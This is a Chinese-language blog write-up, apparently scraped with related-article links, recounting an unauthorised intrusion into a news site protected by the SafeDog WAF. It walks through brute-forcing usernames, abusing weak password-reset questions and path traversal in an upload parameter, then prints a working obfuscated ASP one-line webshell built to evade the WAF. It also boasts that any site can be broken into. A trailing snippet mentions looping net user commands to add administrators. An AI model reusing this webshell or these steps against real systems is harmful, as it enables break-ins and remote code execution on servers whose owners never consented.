常规渗透:没遇到过的anquan狗
0x01 信息收集
服务器信息: windows 2003 + IIS 6.0 + aspx . Php + 安全狗
站点cms信息:一套aspx新闻发布系统 和 Discuz X3
端口信息 : 服务器好像有拦截了, 探测不了 暂时先不看了 找下突破点。
0x02 寻找突破点
先明确下思路, 主站 – DZ论坛弱口令 getshell – 旁站 – 社工 – C段嗅探
先从主站 找下突破点 , 发布新闻 肯定会有上传点的 习惯性的扫一下。

没扫出什么东西 懒得放 WVS appcan 去扫了,手工找下敏感信息吧。
后台登录:http://www.xxoo.com/System/Login.aspx

会员中心:http://www.xxoo.com/user/login.aspx

有两处登陆的地方 后台弱口令 万能密码无果
去看一下会员中心 有个注册会员 好像是删除了,打不开

0x03 忘记密码找回突破
思路就快中断时候,灵光一闪 ,不是有个忘记密码么
注册不了 我们就来找回一个用户呗 说干就干

的确有admin 这个用户 试各种答案 都无果..
又蛋疼了.. 先静下心想想思路……………………………………………..
会员中心 会员中心 不就是有很多会员的么 不止一个用户 肯定有别的用户
设置一些傻瓜化问题!
打开 Burpsuite 爆破几个用户名来试试。

成功爆破到一个 用户 试试他的问题吧,

还真是傻瓜化问题 , 答案 就是问题 。 得到一个随机密码 登录之~
0x04 突破上传拿webshell

进到会员中心 发布新闻 找到这个上传点原本以为是Fckeditor 编辑器 可以秒杀 。
但是他用的不是原本的那个上传,这个上传点 什么东西都上传不了…
然后到处找啊找,,

还好找到一个可以上传的地方 附件上传 有上传就行~~上神器burp 截断试试。

本以为改成aspx 可以直接秒杀 ,, 但是404了.. 好吧 仔细看一下上传验证
—————————–7def81f240104
Content-Disposition: form-data; name="File_PicPath"
news|0
—————————–7def81f240104
File_PicPath 参数 应该可以改 news 是新闻的意思吧
应该是上传到指定上传新闻图片附件的目录~
我们把他改为 ../ 上一级目录试试。

的确是 打开试试

跳到上一级目录 秒杀之~ 开开心心上传一句话~~
0x05 没遇到过的安全狗
上传菜刀本身的一句话,,没想到被安全狗拦截了 不过这个狗 第一次遇到。。

这种安全狗没遇到过… 不过找个中文一句话秒杀之~~
附上中文一句话:
<%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=i&love&you
CNM=Request(OK)
eVal CNM 'pass:我爱你
%>
密码:我爱你
本次渗透到此结束了,提权没空去提, 学生党伤不起 思路要淫荡 头脑要明确 !
总结一句话:不管你有什么拦截 只要你思路淫荡 没有你日不到的站。
常规渗透:没遇到过的anquan狗的更多相关文章
- web渗透学习目录
一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[S ...
- 13. CTF综合靶机渗透(六)
靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网,并 ...
- 渗透神器cobalt strike在数字杀软环境下的使用
当我们拿到cobalt strike的beacon权限时,使用它如何渗透目标内网.因为我看网上的文章都是在无杀软下写的,这难免有点脱离实战环境,本文主要测试CS的beacon在数字杀软环境下进行常规渗 ...
- 内网渗透测试思路-FREEBUF
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...
- 安全狗两个中危提权+NET提权
1.循环加组复现 for /l %%i in (1,1,1000) do @net user admin admin /add&@ net localgroup administrators ...
- 采集练习(十二) python 采集之 xbmc 酷狗电台插件
前段时间买了个树莓派才知道有xbmc这么强大的影音软件(后来我逐渐在 电脑.手机和机顶盒上安装xbmc),在树莓派上安装xbmc后树莓派就成为了机顶盒,后面在hdpfans论坛发现了jackyspy ...
- Centos Linux下使用Metasploit渗透android
.newline{display:block}.katex .base{position:relative;white-space:nowrap;width:min-content}.katex .b ...
- 【扯淡篇】CTSC/APIO/SDOI R2时在干什么?有没有空?可以来做分母吗?
注意: 我比较弱, 并没有办法把外链bgm搞成https, 所以大家可以选择"加载不安全的脚本"或者把https改成http以获得更好的阅读体验! 据说, 退役了要写写回忆录. 但 ...
- iptables看门狗
近来业内很多服务器因redis造成服务器被黑,这个攻击的防范重点在于防火墙!! 有时为了方便我们可能会将iptables临时关闭,方便完倘若忘记把它打开,黑客大摇大摆就走进来. 这时候,我们需要条看门 ...
随机推荐
- C++ 隐含的this 指针
c++primer 页数:376-379 备份, 很有嚼头 #include <iostream> #include <string> #include <fstre ...
- 转 File "/usr/bin/yum", line 30 except KeyboardInterrupt, e:
因为yum包使用python2*等开发,修该为环境修改python3之后有问题, 解决: 修改文件/usr/bin/yum./usr/libexec/urlgrabber-ext-down头中相应py ...
- solr 索引库的维护
一.配置中文分析器:IK-analyzer,在FieldType中指定中文分析器:1 复制IK-analyzer到你的服务器指定目录中.2 在该目录中,我们需要的东西有:IKAnalyzer的jar包 ...
- js 获取 客户区 大小
js 获取 客户区 大小 本文内容来自<javascript高级程序设计(第二版)> 内容, 只是方便大家以后可能会用到... <script type="text/jav ...
- js 屏蔽浏览器事件汇总
//js 屏蔽 window.document.oncontextmenu = function () { event.returnValue = false; }//屏蔽鼠标右键 window.do ...
- Oracle 数据库字典 sys.col$ 表中关于type#的解释
sys.col$ 表是oracle基础数据字典表中的列表,表中描述了数据库中各列信息,其中type#是列的数据类型.以下表格说明了各个数值的含义,以供参考. 值 说明 1 如果列 charsetfor ...
- C Primer Plus note6
error: invalid preprocessing directive #difine| 无效的宏定义处理 宏定义define 写成了 difine.
- vue学习笔记(一)
一.MVC 和 MVVM 的区别 MVC: Model(模型)应用程序中用于处理应用程序数据逻辑的部分(通常模型对象负责在数据库中存取数据). View(视图)显示数据(通常视图是依据模型数据创建的) ...
- 小白学习css记录
一.复习 什么是CSS? 层叠样式表 -层叠样式只会被覆盖而不会被替代 CSS的使用方式 style属性---> <h1 style="css属性"></h ...
- sql-syscolumns,INFORMATION_SCHEMA.columns,sysobjects
//计算表tb_Blog的字段个数 select count(*) from syscolumns where id=object_id('tb_Blog') 获取指定表的所有字段和字段类型 SELE ...